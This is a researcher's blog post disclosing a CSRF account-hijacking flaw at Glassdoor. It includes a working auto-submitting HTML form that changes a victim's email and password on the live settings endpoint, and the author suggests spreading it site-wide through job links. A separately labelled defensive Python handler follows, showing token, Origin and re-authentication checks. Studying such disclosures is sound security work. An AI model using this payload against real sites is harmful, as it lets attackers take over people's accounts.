Hello, I'm Mohamed M. Fouad, an independent security researcher from Egypt. I have received acknowledgements from many firms such as Microsoft, Oracle, Yahoo, eBay, Sony, AT&T, Huawei, Adobe, DropCam, Bitcasa, Get Pocket, Splitwise and many more...
================================================
CAUTION
THIS IS FOR LEARNING PURPOSE AND FOR ETHICAL USE ONLY...
Glassdoor is an American site, launched in 2007, where employees and former employees anonymously review companies and their management. In the year prior to April 2014, more than 500,000 company reviews were submitted to the site.
Hello Guys!
Today I will show you how I discovered several critical security vulnerabilities at Glassdoor. They can have a very harmful impact on all users by forcing users to change their passwords, change their emails or change anything in their profile settings such as job alerts. These vulnerabilities can also be escalated to deface the whole site by posting malicious URLs in job reviews, after which every user's password would be changed.
Before I begin, I would like to warn Glassdoor to fix this security vulnerability because it can harm their website and all users, like what happened at Jobvite after my article was published in The Hacker News; Jobvite then changed their website due to dangerous security vulnerabilities (SQLi and LFI). I reported the CSRF account hijacking vulnerability to other job websites and they fixed it immediately because it is so critical. I also need to announce to all users that I focused on job websites 6 months ago and found that they are not secure at all against this vulnerability, and also against other dangerous vulnerabilities like SQLi, XSS, Broken Authentication and Insecure Direct Object Reference. When I reported these critical vulnerabilities to different famous job websites I got great bounties and they hired me as a freelance security consultant.
Story :
One and a half months ago I found a critical vulnerability in Glassdoor: account hijacking via CSRF. An attacker can use it to deface the whole website by adding a new job with a malicious URL that changes users' passwords after they visit the job. When I tried to contact them via email and social media they did not reply to me.
The impact was that you can change any details in the user's account settings, and this is the most critical point in this article: you can change the user's password or e-mail, and this can be done via just one click on a malicious URL.
Below is the critical one!!!!
Change Email Address and Password CSRF:
=============================================
<html>
<body onload="document.csrf.submit()">
<form action="https://www.glassdoor.com/member/account/settings_execute.htm" method="post" name="csrf">
<input type="hidden" name="selTabIndex=1" value="1"><br>
<input type="hidden" name="emailAddress" value="attacker@hotmail.com"><br>
<input type="hidden" name="birthYear" value=""><br>
<input type="hidden" name="race" value=""><br>
<input type="hidden" name="highestEducation" value=""><br>
<input type="hidden" name="newPassword" value="hacked@2014"><br>
<input type="hidden" name="confirmPassword" value="hacked@2014"><br>
</form>
</body>
</html>
=============================================
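As an added defensive example (not Glassdoor's code and not the author's), here is how a settings-update handler can refuse a request like the auto-submitted form above: a session-bound synchronizer token compared in constant time, an Origin-header check, and a current-password requirement before any email or password change. The handler name, the secret key, the session ids and the sample requests are all constructed for illustration.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple

# Constructed illustration, not Glassdoor's code. A real deployment would also set
# SameSite=Lax/Strict on the session cookie so a cross-site POST carries no session.
SERVER_KEY = secrets.token_bytes(32)        # per-deployment secret (constructed)
SITE_ORIGIN = "https://www.glassdoor.com"   # origin of the legitimate settings page


def csrf_token(session_id: str) -> str:
    """Token bound to the session: embedded in the real settings form, but an
    attacker's page cannot read the victim's session and so cannot produce it."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def valid_csrf(session_id: str, submitted: Optional[str]) -> bool:
    """Constant-time comparison so the check does not leak the token byte by byte."""
    return bool(submitted) and hmac.compare_digest(csrf_token(session_id).encode(), submitted.encode())


def settings_execute(session_id: str, form: Dict[str, str],
                     origin: Optional[str]) -> Tuple[int, str]:
    """Hardened counterpart of a settings-update handler (hypothetical name).
    session_id: what the session cookie identifies; form: the POST body;
    origin: the Origin header, which browsers attach to cross-site form posts."""
    # 1. Reject a POST that the browser tags with a foreign origin.
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-origin request rejected"
    # 2. An auto-submitted attacker form carries no valid token, so it stops here.
    if not valid_csrf(session_id, form.get("csrfToken")):
        return 403, "missing or invalid CSRF token"
    # 3. Email or password changes additionally require re-authentication
    #    (a real system verifies currentPassword against the stored hash).
    if ("newPassword" in form or "emailAddress" in form) \
            and not form.get("currentPassword"):
        return 400, "current password required"
    return 200, "settings updated"


def demo(session_id: str = "victim-session") -> Tuple[int, int]:
    """(status for a cross-site PoC-style form, status for a legitimate submit)."""
    attack = {"emailAddress": "attacker@hotmail.com", "newPassword": "hacked@2014",
              "confirmPassword": "hacked@2014"}          # constructed, no token
    legit = dict(attack, csrfToken=csrf_token(session_id), currentPassword="old-pass")
    return (settings_execute(session_id, attack, "https://attacker.example")[0],
            settings_execute(session_id, legit, SITE_ORIGIN)[0])   # (403, 200)
```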
Hope you find it interesting and HAVE FUN with POC Video :)